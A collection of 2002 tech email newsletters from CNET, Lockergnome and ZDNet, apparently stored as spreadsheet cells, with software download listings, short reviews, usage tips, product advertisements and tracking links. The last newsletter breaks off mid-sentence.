   Minimum Requirements: Mac OS 9.x through Mac OS X 10.1.5   Web designers have an array of software choices, from writing
   straight code in something like SimpleText to automating
   everything via drag-and-drop programs that keep HTML at arm's
   length. WebDesign offers a happy medium, with a significant
   number of nice extras. You can drag-and-drop from menus or
   edit your syntax line by line; build image maps and forms
   with relative ease; and work with a full selection of tools
   for site-wide color scheme changes, text manipulation, and
   localization. WebDesign supports both HTML and XHTML, along
   with JavaScript, tabs, and Cascading Style Sheets. This new
   version lets you view your designs as they will be seen with
   various browsers, and has more stable editing and FTP tools.   http://clickthru.online.com/Click?q=ea-fjLyQhV4XV54QHSAwQ4lAUw-5WnR    Want to review WebDesign? Submit your opinion here:
   http://clickthru.online.com/Click?q=ff-sVoVQms4mycg6wFZxrhBm0WHtheR    Find all of the latest development tools here:
   http://clickthru.online.com/Click?q=14-5MRAIF-zGNg8yFP8ZvQIzTKtR1yR 
   IN GAMES:   SIGMA CHESS LITE
   Version: 6.01
   File size: 2.94MB
   License: Free
   Minimum Requirements: System 7.x   Put your mind to the test with this customizable chess game.
   Sigma is OS X-native and lets you develop your skills through
   levels with adjustable difficulty and customizable pieces and
   boards. What's more, Sigma offers advanced features such as
   printing functions, player rankings, and the ability to
   record and collect your matches.   http://clickthru.online.com/Click?q=29-Sg_rIjMAh2p0eOyNyGEI9rCM8vlR    Want to review Sigma Chess Lite? Submit your opinion here:
   http://clickthru.online.com/Click?q=3e-F51nIizXmE6GxOG_7DQESNPe-i4R    Find all of the latest games here:
   http://clickthru.online.com/Click?q=53-n86dINn6Z4onc-PjHpx8lOheMncR ______________________________________________________________4. Updates &amp; Drivers: Stay on Top of Bug Fixes and New Features   IN INTERNET:   - Internet Explorer (OS X) 5.2.1
     http://clickthru.online.com/Click?q=68-iM8qIsPPH1noIAYywvjsK-FdLPRR    - mDialog 1.5
     http://clickthru.online.com/Click?q=7d-FFEqIDLPzooVNqPUywq2NRJSBTZR    - Email Magician 1.9
     http://clickthru.online.com/Click?q=92-ubRVQTzT5OEFHMGzeFOPq1FsnynR 
   IN MULTIMEDIA &amp; DESIGN:   - Audacity 1.0
     http://clickthru.online.com/Click?q=a7-fR_2Q8BwVK0bvAKLF5vLk7KCgFeR    - Audion 3.0
     http://clickthru.online.com/Click?q=bd-c0nUQ7py5LqbJMqpAEVgnfqGsJPR    - Audion (OS X) 3.0
     http://clickthru.online.com/Click?q=d2-THo_QULw1K18AlW3Gl22vbAOyenR 
   IN UTILITIES:   - MacAnalysis 2.2.1
     http://clickthru.online.com/Click?q=e7-2y-GQmVXoNS0Rb0VqS8CMB0qvseR    - SpeedRun 1.1
     http://clickthru.online.com/Click?q=fc-WpHmQVwFSZlZa-Pa9-0t3VVat9yR    - DockFun! 3 preview 1
     http://clickthru.online.com/Click?q=11-l8riI2-4EmyuB-jX3VynhNBuCqlR 
   IN BUSINESS AND FINANCE:   - OmniGraffle (OS X) 2.0.5
     http://clickthru.online.com/Click?q=26-KqPVIiMHorsZwJdBBBkqU8niQ74R    - Sambucus 2.0.1
     http://clickthru.online.com/Click?q=3b-XhxVINdHn73JEjnFPcZsjpRp-LrR 
   IN HOME AND EDUCATION:   - Blues Music 1.0
     http://clickthru.online.com/Click?q=50-M_CBIR0XguMCAewASOnO8CtmMgRR    - Dramatica Pro 4.0
     http://clickthru.online.com/Click?q=65-K82zIDPtIzc8RGwD70VOf0m8P9ZR    - iNotePad 1.6.1
     http://clickthru.online.com/Click?q=7a-EE_AIPBjUlSulSvhU6coezkBZXdR 
_______________________________________________________________5. The Week in Reviews:   A TiVo-like toy for the Mac?   A Macintosh software company plans to launch Monday the first
   consumer personal video recorder for Mac aficionados.   http://clickthru.online.com/Click?q=8f-OOYvQ8KKwfwRqEUXvsg9tyQFWveR 
_______________________________________________________________6. Overheard on Download.com   Here are some user comments about a Mac game that takes you
   back to the days of hanging out at the arcade:   "Cool!"   "An arcade classic!!!"   "Great fun without violence!"   "Addicting!!!!"   "Excelente"   So what's the name of this mystery download? Click here to
   find out:   http://clickthru.online.com/Click?q=a5-DyaHQ7ZTaQfujbpsIC1b2OB8OEPR 
_______________________________________________________________The e-mail address for your subscription is qqqqqqqqqq-zdnet@spamassassin.taint.orgTo sign up for more CNET newsletters, click here:
http://nl.com.com/servlet/url_login?email=&amp;brand=cnetTo unsubscribe, click here:
http://clickthru.online.com/Click?q=ba-m-e5rUpfTfmrcJ0ghqSMlcoEWYe2yRRRTo receive your newsletter in HTML format, click here:
http://nl.com.com/servlet/url_login?email=&amp;brand=cnetFor the CNET Newsletters FAQ, click here:
http://clickthru.online.com/Click?q=cf-ebM-QLw2HM7JIXMJaylIO7r3fxeR To learn about advertising opportunities in CNET Newsletters, click here:
http://clickthru.online.com/Click?q=e4-ABYFQVkWG2Bq9mbI81u0PT_Qv1yR 
Copyright 2002 CNET Networks, Inc. All rights reserved.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</si>
  <si>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20020717 Lockergnome Windows Daily
Â  07.17.2002 GnomeREPORT FREE COLOR PRINTERS FROM XEROX - $4,500 VALUE Enroll in the Xerox FreeColorPrinters program and get a Phaser network color printer for FREE.  Small businesses, schools and non-profits have been participating in this risk free program since 1999. Learn more.  
Falling asleep at the wheel is no laughing matter. Still, it kinda
happened with yesterday's
tip. I forgot to mention that the String value's label
is "Logging" (sans quotes). That was almost like a cliffhanger,
eh? The oversight was totally my fault. I've been thinking about
asking Gretchen and Brian to help with future reviews. Don't be
surprised if that happens soon. I'm sure you'd welcome a female
perspective on this stuff, right? She helped one of our landlords
pick a paint color for the "office" wall this evening. Does that
qualify her to talk about cool stuff that we find for you on the
Internet? You betcha. Let's see how she does with the drapes and
rugs. I have a feeling I'll be the one tweaking furniture layout.
Shouldn't be too much of an issue - yet. I wonder if Ikea has an
affiliate program?I've mentioned how Yahoo Mail's beta is mangling our commas, but
did you know that it's also (possibly) rewriting your e-mail? If
you send an HTML message to someone who has a yahoo.com account,
something may get lost in the translation. Try sending this
sentence: "My medieval mocha has an expression to evaluate."
Again, be sure this note is sent in HTML format. The results will
surprise you. As far as I can tell, they're doing this to stop any
scripts from being distributed to their user base. I must credit
Marion Schroll for making me aware of the "problem." It's kinda
funny, in a weird sort of way. Not that I would want anything I
send changed in any way, shape, or form. It begs the question:
what next? I mean, where does it all stop? Give them a bit, and
they just might take a byte. Censorship is only a stone's throw
away.I really feel for Lockergnomie Sharon Clark, who asks: "What is
this crazy business with the broadband metering? What they
advertise doesn't seem to be what you get. Now that I'm forking
out $60 per month for a supposed metered rate of 640 down / 320
up, I'm feeling clueless and left out in the cold. Not sure what
I'm paying for, not sure what's going on at the office, not sure
if I'm capped, not sure if I'm getting ripped off! Can you help me
out here? I'm feeling lied to; why can't I download 'til my 40 gig
is full? That is what they promised me and that is what I THOUGHT
I was paying for. I want consistent speed - is this too much to
ask?" It's not too much to ask the question, but it's probably too
much to get the answer. I'm facing the same dilemma right now,
even though cable-based connectivity isn't available in my area.
Expect more and more "filters" to be put in place as time marches
on. Watch those EULAs, folks.See You in August,Â Â Â Â Â Â Â Â Â Â Â Â Â Â Chris PirilloÂ Â Â Â Â Â Â 
Â GnomeDOWNLOADSLatest Downloads
AntiVir PE 6.14.00.63
MP3 Rename 7.1.4.0
OE-QuoteFix 1.15.5
AntiVir PE f 6.14.00.63
MyKazaa 1.0
EraseTemp 3.1.0.2
ZAP Audio Player 1.20
PocoMail 2.61.1056
Webserver Stress  5.3.4
PhotoMeister 1.04
PopupWar 3.0.75
Disk Triage 6.3.1.0
Broccoli ADS 2.0
Mail REDirect 1.3.240
Mindex Image Vie 2.7.16Directory Lister v0.5.2 [547k] W9x/2k/XP FREEhttp://freeware.prv.pl/{List directory contents} When I was younger, I'd get so frustrated at those games where you'd have to pick out all of the subtle differences between two pictures. I'd always end up with one or two that I just could never see. When I want to do the same type of comparison between two directories on my computer, I use Directory Lister and I never miss a thing. Not only does Directory Lister display the contents of your chosen directories, it will also let you save the output to an HTML file. This is great for web developers who want a quick way to list the contents of a ZIP file before archiving it and uploading it to their website. As an added bonus, Directory Lister also shows the date, time, and attributes of the files in your directory, making it easier than ever to compare the differences in files between two directories.
Web Calendar [25k] W2k/XP FREEhttp://members.lycos.co.uk/bleucanard/WebCalendar.htm{Web page reminder} Surfing the web as much as I do, I'll occasionally run into a site or page that commits the horrendous faux pas of displaying an "Under Construction" banner. I COULD forget about the site and maybe somehow encounter it later, or I COULD drop the site into Web Calendar and have this handy-dandy app remind me to check the page again in a week. The same technique holds true for my normal browsing... for example, I can use Web Calendar to remind me to check out the Digital Media newsletter every morning, or to check Amazon for a CD that I know will be released in a week. Now, I will have no excuse for missing the DVD release of "Lord of the Rings"...Recommend It!
Â GnomeCLICKS
Â GnomeSYSTEM
SQLView v2.1.0.20 [5.2M] W9x/2k/XP FREEhttp://mywebpages.comcast.net/fredbubbers/software/{View ODBC Output} SQLView is "A SQL Database viewing utility. (It) automatically detects all available ODBC data sources and displays them in an explorer-like tree. User(s) may double-click on data sources to access the databases, browse tables, execute custom queries and export (the) data to .CSV or .XML files." I didn't really have much on my machine to throw at this program. However, the one data source I did have (mostly related to Music CD creation) displayed perfectly in SQL View. (And I have the .csv file to prove it!  Nyah!)
Recommend It!
Â GnomeWILDCARD
CollegeBAR v8.0 [5.9M] W9x/2k/XP US$20
    Unearthed by Shawn Verrallhttp://www.pracx.com/collegebar.asp
{Mix your own drinks} When I was in college, my room used to be known as "The Bar." It may have had something do with my L-shaped desk that resembled a bar, and the fact that I had seen the movie Cocktail too many times and wanted to be a bottle-flipping bartender. I never achieved my goal of being the world's best geek bartender, but maybe with College Bar I could have. College Bar contains recipes for over 11,600 drinks. With an online update feature, you can download new drinks as they become available... or you can add your own creative concoctions to the database! College Bar also has a calculator to determine someone's blood alcohol level... drink responsibly, folks. As an added bonus, you can load some of your favorite party pictures into the program and you'll see a slide show of those pictures - a great way to remember the good times... unless you don't remember experiencing them in the first place, that is. Dude, where's my car?Submit Your Thoughts | Recommend It!
Â GnomeFAVORITEBuy One Inkjet Cartridge - GET TWO FREE!! Buy 1 Get 2 FREE on Most Epson, Canon, and Apple Cartridges. Wholesale Pricing on Lexmark Cartridges. Free Shipping on orders $25 or more!! U.S. Shipping Only. Click Here For a Complete List of Cartridges.Beliefnethttp://www.beliefnet.com/{Daily enlightenment} Whether you're Buddhist, Hindu, Muslim, Christian, Jewish, or anything else, Beliefnet.com has something for you. You can sign up for any of the ten Beliefnet newsletters - there's even one devoted to religious jokes. However, if you aren't looking for enlightenment for your Inbox, then just feel free to browse around. You're sure to find something interesting in the Inspiration section; the Parenting section has helpful features and articles. Or, test your savvy with "Stump Our Bible Expert." If you're seeking something new in the way of your spirituality, or are looking for some affirmations of your existing beliefs, it's likely you'll find it at Beliefnet.
Recommend It!
Â GnomeTIPI am a sucker for keyboard shortcuts. Anything that can save me from using the mouse is good in my book. Occasionally I like to view the web or Windows Explorer in Full Screen mode... to do this I just hit F11 on the keyboard and there I am in Full Screen mode. Hit it again and I am back to regular mode. If you aren't as much of a fan of keyboard shortcuts as me, then all you have to do is press and hold the Ctrl key while clicking on the Maximize button and you will have the same effect. You will notice, however, that your Start Menu isn't anywhere to be seen. Never fear, another keyboard shortcut is here... just press Ctrl key plus the Esc key and your Start Menu will be back where it belongs. Alternatively, if you have a Windows key on your keyboard you can use that key to bring up your Start Menu as well.
Recommend It!http://www.lockergnome.com/issues/daily/20020717.html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how Sprocket thinks he has a right to eat pumpkin seeds. Or, would that be "pupkin" seeds?Not for the Puppy
Â 
CLICK HERE TO ZOOMÂ Â 
BYTE ME NOWÂ©2002, Lockergnome LLC. ISSN: 1095-3965. All Rights Reserved. Please read our Terms of Service. Our Web site is hosted by DigitalDaze. Domain registered at DNS Central.
The "ZIP" in Zip Code stands for "Zoning Improvement Plan."
</t>
  </si>
  <si>
    <t>&lt;!--
 body      { BACKGROUND-IMAGE: url(http://images.lockergnome.com/images/issue/top-right.gif); color: #14367A }
 a:link    { COLOR: #2E64DC; TEXT-DECORATION: underline; font-weight: normal }
 a:visited { COLOR: #000000; TEXT-DECORATION: underline; font-weight: normal }
 a:active  { COLOR: GRAY; text-decoration: none }
 a:hover   { color: GRAY; TEXT-DECORATION: none }
 p.title   { BACKGROUND: #2E64DC; BORDER-BOTTOM: #14367A 4px solid; BORDER-LEFT: #94B2EE 4px solid; BORDER-RIGHT: #14367A 4px solid; BORDER-TOP: #94B2EE 4px solid; COLOR: #FFFFFF; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 14pt; FONT-WEIGHT: normal }
 p.sidebar { BACKGROUND: #94B2EE; BORDER-BOTTOM: #2E64DC 3px solid; BORDER-LEFT: #FFFFFF 3px solid; BORDER-RIGHT: #2E64DC 3px solid; BORDER-TOP: #FFFFFF 3px solid; COLOR: #14367A; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 10pt; FONT-WEIGHT: bold; TEXT-ALIGN: center }
 .url      { font-size: 8pt; font-family: Verdana, Tahoma, Arial }
--&gt;
20020716 Lockergnome Apple Core
Â  07.16.2002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Of the comments I received on AppleScript, every single one suggested I 
start with the basics, for that reason,  I'm going to take things 
step-by-step,  following my own learning process and progressing to 
gradually more difficult concepts. Despite having experience in 
programming, using a variety of languages, I initially found AppleScript 
to be quite intimidating -- mostly because something about the Script 
Editor seems less than intuitive. If you've already been dabbling in 
scripting, the first few columns on the subject will definitely be 
targeted at novices, but I want to everyone to have the chance to get 
up to speed.I'm off to the 
Shareware Industry Conference for the remainder of the week, 
where it's looking like the selection of stuff for Mac users will be very 
bleak. I believe the organization is targeted more toward the Windows 
community in general and any shareware developer with enough cash to get 
there is probably going to be in New York for MacWorld. I'll be missing 
out on the Web cast of Steve Jobs speech, which is scheduled to take place 
while I'm in the car, but at least I'll be able to catch the details at 
other Mac sites when I get to St. Louis. Internet access for the trip is 
being provided by Crosspaths.net, which is one of the few dialup services 
I've found that can be configured to relay my Lockergnome mail so that I 
can still function on the road. I tested the service on my iBook this 
evening just to be sure.With some luck, I may be able to get Internet access from the highway, via 
my Kyocera 6035, and see what Jobs had to say before I get to St. Louis. 
Unfortunately, there's no support for OS X yet with the 6035, so I can't 
use the unlimited nights and weekends to dial the Web from my laptop. A 
landline will probably be more sensible anyway. Check my blog for some 
updates on the trip, Lori's attending too and I'm sure she'll be taking 
lots of photos, as usual.See You in August,Â Â Â Â Â Â Â Â Â Â Â Â Â Â Jake LudingtonÂ Â Â Â Â Â Â Â GnomeDOWNLOADS
Same-X v2.0 [1.73MB] OSX 10.1.1 FREE
http://www.thumpbunny.com/Seven themes, two board sizes and your choice of difficulty levels, makes 
this a game for the entertainment addict in all of us. The object is to 
clear the board of all icons, removing them in matching clusters of two 
or greater at a time. Clearing the screen awards bonus points and scoring 
awards clearing of larger clusters. Nothing gets killed, there's no 
swearing, but you'll find yourself addicted to the mindless fun anyway -- 
not to mention you can feel safe sharing this with kids.
Â GnomeNETWORK
Samba Sharing Package v1.5 [8.3MB] OS X FREE
http://xamba.sourceforge.net/ssp/It remains to be seen whether 10.2 will render this type of application 
unnecessary, but for those out there without the cash to spend on DAVE, 
for small office or home networking of Mac/PC mixed environments, this 
is the only real alternative. Installation and configuration is almost 
painless, making it easy for your Windows machine to see apps on your 
Mac with little difficulty. The interface, like most OS X GUI apps, is 
quite easy to navigate, including user management, connection 
management, and share configuration into a convenient Prefernce pane.Â GnomeSCRIPT
Technically speaking, you could do most of your script writing in a text editing 
application like TextEdit, but ultimately you've got to compile it in the Script 
Editor, so you might as well start there. The Script Editor is located in the 
AppleScript subfolder of your Applications folder. Opening the application for 
the first time reveals a small window divided in to two sections, Description 
and the actual scripting pane, separated by a group of buttons.Ignore the buttons for the moment and concentrate on the two text panes. The 
Description pane is where you label your script, so you can remember later what 
it does. This is also the place you denote the key combination that will invoke 
your script. If you choose to save your script as an executable application, the 
information in the description will show up in the start up screen.The second pane is where the magic happens. In this pane you will be telling 
applications to do specific tasks when your script runs. The format for scripting 
is fairly linear. You either start your script at the top most level drilling 
down, until you actually reach the application or object you want to manipulate 
with your script, or you take the reverse approach manipulating things from the 
bottom up. Telling the "Applications" folder to tell its "Jake" subfolder to tell 
the application "Jake's Media Player," located in that folder to do something 
could also be written by telling the script to access "Jake's Media Player" 
located in the "Jake" subfolder of the "Applications folder,  The upcoming example 
will make this a bit more clear.Buy One Inkjet Cartridge - GET TWO FREE!! 
Buy 1 Get 2 FREE on Most Epson, Canon, and Apple
Cartridges. Wholesale Pricing on Lexmark Cartridges.
Free Shipping on orders $25 or more!! U.S. Shipping Only.
Click Here For a Complete List of Cartridges.   
Â GnomeFAVORITE
Glitschka.com
http://www.glitschka.comFlash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This is by no means a Mac only site, the entertainment is 
accessible by everyone and icons are available in both Mac and PC versions.
Â GnomeTIPTraditionally, Mac OS has always placed a link to various disks in use on the 
desktop, which can be convenient, but is no longer necessary with the Finder 
only a Command+Tab away in the Dock. My personal desktop is usually cluttered 
with files I've downloaded from the Internet, so I can never find anything 
when my desktop is in plain sight, the Finder is the only way I stay organized. 
For desktop slobs like me, or for neat freaks who want nothing on the desktop, 
OS X includes three handy options for keeping disks in their place. Open the 
Finder Preferences window and uncheck the three checkboxes under Show these 
items on the Desktop. You'll have more space for other icons to clutter the 
desktop or in the case of you clean folk, you'll have nothing at all.Tip by Jake
http://www.lockergnome.com/issues/applecore/20020716.html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
Â Top 50 Fun Sites
Â Must-Know Tech Terms
Â Top 50 Useful Sites
Â Top 75 Tech Sites
Â Top 50 PenguinCORE
Â Top 50 PenguinTWEAKSÂ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BookÂ General Feedback
Â E-mail the Editors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</si>
  <si>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
Download Dispatch - PC Edition
Downloads
  All
CNET
  The
Web
In Utilities:
CloneCD 4.0
In Audio:
Sound Forge 6.0a build 150
Media Jukebox 8.0.32
In Internet:
Accelerate 2K2 3
In Multimedia:
FotoTime FotoAlbum 3.0.2
In Web Authoring:
J-Perk 6.04
TextSOAP 1.5.2
In Business &amp; Finance:
FileMaker Pro 6.0v2
In Games:
Balls of Steel Patch 1.3Most Popular Upgrades:Â 1.
ZoneAlarm Pro 3.0Â 2.
Norton AntiVirus 2002Â 3.
AdSubtract Pro 2.5Â 4.
Microsoft Windows XP - ProfessionalÂ 5.
Nero Burning ROM 5.5Â 6.
Reason 2.0Â 7.
Microsoft Windows XP - Home EditionÂ 8.
QuickBooks Pro 2002 Â 9.
Adobe Photoshop 7.010.
WinZip 8.1
Find a
                   complete list of the 50 most popular software products at
                   CNET
Shopper.com.
Summer 2002 software
Test your bandwidth
New jobs, click here!
Inside HP 
Bluetooth: speeds up
July 9, 2002
Rhapsody rulesI never thought Iâ€™d say it, but Iâ€™m changing my tune about subscription music services.When MusicNet and Pressplay launched their monthly subscription services late last year, I was unimpressed. Their music catalogs were limited, the software was clunky, and the copyright protection features seemed unduly restrictive. I wondered how they could ever compete with the seductive (read: free) charms of file sharing. But last week I decided to try out Listen.comâ€™s Rhapsody, a subscription streaming music service that recently managed to secure recordings from all five major labels. And now Iâ€™m rethinking my stance.Rhapsody is not for everyone. If you like to burn your MP3s to CD or download them to a portable player, youâ€™ll want to look elsewhere; Rhapsody allows CD burning only for a small portion of its catalog, and only for an extra charge, and you canâ€™t download MP3s at all. But what Rhapsody does have is music, and lots of it--thousands of albums of all major genres on demand as well as tons of preprogrammed radio stations. I think Listen.com might be onto something with its streaming service. Would you pay 10 bucks a month for a service that has all the music you could ask for, but won't allow you to actually download MP3s? Let me know at edit@download.com
Kelly GreenDirector, CNET Download.com
Power Downloader fixes his computer
Sometimes even a superhero has to handle mundane computer
   maintenance. Power Downloader's Weekly Picks returns with
   four apps that will save your PC from itself.
Protect your PC
It almost seems like there's a new virus in the news every
   week. Of course, you want to protect your PC. But
   how? CNET Software editors walk you through 10 antivirus options.New products from our
sponsors New Window Washer 4.7
What you do online is nobody's business. Take control with
   Window Washer. Protect your privacy, clean unwanted files, and
   boost PC performance. Download a free trial version today.
 Magic: The Gathering Online
Have the deadliest strategies all at your control. Experience the most
   competition. There's always a game on.
   As your game grows, new challenges await.
All Download Launchpad
titles powered by Download Express--CNET's new speedy download
service!
KaZaA remains at the top, our very own CNET CatchUp moves up
   a couple spots to No. 8, and Download Accelerator drops 2
   spots to round out the list at No. 10
 Most Popular TitlesWeek ending July 14 Last  Week 
 Weeks  on Chart 
 Downloads  This
                   Week 1.KaZaA
Media Desktop1
11
2,251,808
2.ICQ
2002a3
251
609,430
3.Morpheus2
63
565,410
4.WinZip4
300
452,540
5.iMesh5
116
353,287
6.BearShare6
74
177,000
7.Ad-aware7
44
156,911
8.CNET CatchUp 1.3110
115
114,250
9.Qtraxmax9
4
110,923
10.Download Accelerator8
135
109,139
           Here are some of the
fastest-rising downloads on our Most Popular list.
Top Movers
The Rundown 1.
LimeWireAs always, people continue to search for the perfect
      file-swapping client as this P2P tool moves up 3 spots to
      No. 13.2.
QuickTimeMPEG-4 technology, skip protection, and several other features in the latest update move Apple's media player up the list 5 spots to No. 29.
       3.
Tony Hawk's Pro SkaterOne of the most popular games on
      any platform, this classic provides
      great gameplay as it volleys up the list 13 spots to No. 36.4.
WindowBlindsCustom desktop skins prove popular
      as this utility rises up 4 spots to No. 41.5.
FlashGetThe latest update for this utility, which splits
      up files for faster downloading, makes a showing at No. 45.           Want more? See our Top 50
downloads.
           In Audio
DFX Collection 6.1
       Free to try; $20 to buyFile size:
      Varies by fileMinimum requirements: Windows (all); Winamp, Sonique, Media Jukebox,
                         MusicMatch Jukebox, or RealPlayer/RealOne/RealJukebox
      Give your software music player a little more bounce to the
   ounce with this set of audio enhancement utilities. The
   settings in DFX give you controls for adjusting fidelity,
   ambience, 3D surround, dynamic gain, and bass boost. New
   additions include processing that optimizes your music for
   headphone listening and a flexible skinning system with
   hundreds of customizable skins to choose from. There are
   separate versions of DFX available for Winamp, Sonique, Media
   Jukebox, MusicMatch, and Realmedia audio players.
In Internet
Opera 6.04
 Free to try; $39 to buyFile size:
3.41MBMinimum requirements: Windows 95/98/Me/NT/2000/XP
Surf like a pro with the latest update of this high-performance Web browser. Opera gives you SLL support, tons of
   keyboard shortcuts, the choice of a single- or multiple-document interface, and a lot of other useful features. This
   update includes minor enhancements and bug fixes.      Want to review Opera? Submit your opinion here.
In Multimedia
3D Canvas 5.7
FreeFile size:
6.69MBMinimum requirements: Windows 95/98/Me/2000/XP, DirectX 8.0Bring pixels to life with this intuitive 3D modeling and
   animation tool. 3D Canvas incorporates a drag-and-drop
   approach to 3D modeling and gives you tools to deform,
   sculpt, and paint 3D objects. You can also create animated
   scenes simply by positioning the objects within keyframes.
   Other features let you save your
   animated scenes as AVI files, customize the interface so only
   those items you use most frequently are visible, and more. Best of all, the
   standard version of 3D Canvas is a free product--learn to use
   it, then get the enhanced version for game development and
   rendering photo-realistic images.      Want to review 3D Canvas? Submit your opinion here.
In Utilities
PrintMagic 1.0
Free to try; $24.95 to buyFile size:
592KMinimum requirements: Windows 98/NT/2000/Me/XPMake quick work of your clipboard notations and printing tasks
   with this simple and very handy app. PrintMagic allows you to
   quickly and easily select and print content from almost any
   application using a drag-and-drop interface or its innovative
   Printboard. Plus, the cost savings and productivity
   enhancements provided by PrintMagic are multiplied for any
   organization that uses many computers.      Want to review PrintMagic? Submit your opinion here.
In Games
ChessRally 2.4
Free to try; $20 to buyFile size:
8.58MBMinimum requirements: Windows 95/98/Me/NT/2000/XPPlay chess over the Internet, against the computer, or through
   e-mail with this full-featured game, which offers a
   customizable interface with free downloadable themes. If you
   get stuck, ChessRally even delivers move suggestions. Blue
   has nothing on you.      Want to review ChessRally? Submit your opinion here.Here are some representative responses from last week's question on who should take the blame for Web sites not being compatible in every browser:
"Web builders should be doing as much as possible to support the broadest possible usage by their target audience"
A little over half the responses put the onus of compatibility on builders."There are far less browser makers than there are Web builders and users. So it doesn't make sense for users or Web builders to do that job does it?."
After Web builders, browser manufacturers got the most blame, although this response makes the best argument."The ordinary users are one group most at fault since they tend to stick to only one browser."
Few responses said users should take responsibility, as most respondents fall into the Web user category."As a professional designer, I say proprietary code is downright evil, no matter who it comes from--and no matter what nifty trick it does."
Quite a number of Web builders wrote in, with many taking responsibility while noting the difficulty of testing in every browser."Because Web pages are viewed 90 percent of the time by IE it is understandable that the time spent to make a site compatible with the remaining tiny minority has to be justified."
A few responses quoted server logs, making the point that it's not cost efficient to make sites compatible for people who choose a low-market share browser.The e-mail address for your subscription isÂ 
UnsubscribeÂ |
Â Manage My Subscriptions
Â |Â FAQÂ |
Â AdvertisePrice comparisons |
Product reviews |
Tech news |
Downloads |
All CNET services        Copyright 2002 CNET Networks, Inc. All rights reserved.          
</t>
  </si>
  <si>
    <t xml:space="preserve">
CNET Shopper Newsletter: PDA Edition
 Shopper
											All CNET
											The Web
										Â 
									1
Cyber Shot DSC-F707
2
Canon PowerShot S40
3
Palm m515
4
Nikon Coolpix 995
5
Canon PowerShot G2
Â 
		All most popular
 Sony CLIE PEG-T665C
											â€¢ 66MHz processor
											â€¢ Transflective LCD
											â€¢ 16MB of RAM
											â€¢ MP3 playback
											â€¢ Strong infrared port
											â€¢ Just $354Accessorize this PDA:
Sony Mini Keyboard 
Sony AC AdapterSony Memory Stick Module
Sony Carrying Case
Looking to upgrade your PDA's memory? No matter what type of handheld you use, CNET's Memory Confiturator makes finding the perfect memory upgrade easier than ever. You're just a few clicks away from maximizing your PDA's potential!
										Check out CNET's new Memory ConfiguratorPalm m130
								â€¢ Free shipping available 
								â€¢ 8MB, Palm OS v4.1
								â€¢ 65,000-color screen
								Â Â Just $210 Palm m515
								â€¢ Fusion of style and power
								â€¢ 16MB, Palm OS v4.1
								â€¢ MultiMediaCard slot
								Â Â Just $312Palm i705
								â€¢ 8MB, USB, rechargeable
								â€¢ Wireless Internet access
								â€¢ Always-on e-mail
								Â Â Just $299Sony CLIE PEG-T615C
								â€¢ 16MB, USB, rechargeable
								â€¢ 16-bit color display
								â€¢ Palm OS 4.1
								Â Â Just $251 Toshiba Pocket PC e310
								â€¢ Powerful mobile productivity
								â€¢ 3.5-inch TFT display/65K colors
								â€¢ Plays MP3/video files
								Â Â Just $329 Compaq iPaq H3835
								â€¢ Free shipping available
								â€¢ 64MB, brilliant TFT screen
								â€¢ 206MHz Intel processor
								Â Â Just $425Sony CLIE PEG-NR70V
								â€¢ Built-in digital camera/MP3 
								â€¢ Built-in keyboard/color display
								â€¢ 16MB, Palm OS 4.1
								Â Â Just $517Compaq iPaq H3870 
								â€¢ Incl. MS Pocket PC 2002
								â€¢ 64MB, integrated Bluetooth
								â€¢ 206MHz, 64K color, USB
								Â Â Just $539 Did you know that ChannelOnline empowers you to compare 
detailed product specifications feature-for-feature? Select the items you wish to compare from your customer-
specific catalog of more than 250,000 SKUs. The product 
comparison highlights differences between the products 
in red, allowing your sales reps and customers to easily 
identify the main differences between each product selected. 
This comparison can then be e-mailed to your customers to 
assist them in making a more informed buying decision.Sign up now to gain access to the most complete, accurate, 
and timely product data available. 
Tell me more about ChannelOnline.
Tech Trends
Hardware
Software
Shopping
Downloads
News
Investing
Electronics
Web Building
Help &amp; How-Tos
Internet
Games
Message Boards
CNET TV &amp; Radio
Music CenterThe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</si>
  <si>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ZDNet AnchorDesk Daily NewsletterNeed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WED JUL 17, 2002Â David CourseyTriple your dial-up Web surfing speeds! Here's how
                Would you pay $5 or $7 a month to make your dial-up Web browsing two to five times faster? A company called Propel is betting you will. After testing the company's new service, I think it could actually fly. Let me explain.
NOTE: Why we're changing our publishing schedule 
PLUS: AnchorDesk Radio: The best gear for your home network New Windows XP on the way... Hackers get life... Bluetooth blues 
When is tiny too teensy? Your ideas on mini-gadgets 
How to protect yourself against worms of the future
MS home networking: What's in it for youCrucial Clicks: More from ZDnet
PrintersPersonal lasers for work 
or home  Laser printers come in all shapes, sizes, and prices. Which one 
is right for you? ZDNet reviewers recommend models for students, SOHOs, and 
more. Read 
reviewsMost 
Popular ProductsPrinters
1. Canon S900
2. Samsung 
ML-1210
3. Epson Stylus Photo 
2200
4. Canon S750
5.  HP OfficeJet 
d145
More popular printers
  Â SYLVIA CARRÂ New Windows XP on the way... Hackers get life... Bluetooth bluesMicrosoft reveals details about a new version of Windows XP with all sorts of new digital-media features. Plus: The House gets tough on cybercrime. And demand for Bluetooth softens along with the weak mobile market. 
 Â DAVID MORGENSTERNÂ When is tiny too teensy? Your ideas on mini-gadgetsSome of you think mini-notebooks are too small to be truly useful. But others say they're ideal for those who need to carry around their computer all day--and were never meant for everyone, anyway. David digests your comments. QuickPoll results: Would you want a super-tiny Sony Vaio U1? Â ROBERT VAMOSIÂ 
How to protect yourself against worms of the future
                It's been a year since the Code Red worm wreaked havoc on the Net. What's changed? Worms and viruses have gotten sneakier. But your antivirus software hasn't. Worried? Robert tells you how to prepare for future threats.
Â JOHN MORRIS AND JOSH TAYLORÂ 
MS home networking: What's in it for you
                Microsoft is jumping into the wireless arena with a line of home-networking equipment. What does this mean to you? Networking gear that's easier to use and more secure than what's out there today, say Josh and John.
Â PRESTON GRALLAÂ 
Get a great HTML editor--for free
                Whether you're a weekend Web warrior or a full-time site builder, you need a capable HTML editor. But you don't have to spend a lot of money to get one. Preston has three free tools that help you build Web pages in a jiffy.
AnchorDesk Home | Previous IssueSign up for more free newsletters from ZDNetThe e-mail address for your subscription isÂ qqqqqqqqqq-zdnet@spamassassin.taint.orgUnsubscribeÂ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</si>
  <si>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
CNET Hardware NewsletterSamsung ML-1430Â 
In HardwareUnitech 2U4U DMR-300 
In ElectronicsVideo Explosion Deluxe 
In SoftwareSony Ericsson T68 
In Wireless
Computers
 				All CNET
 				The Web
July 17, 2002							--Tom Dunlap
							Senior editor
							CNET Hardware
Dear Readers,One of the hot trends in notebooks is squeezing desktop processors,
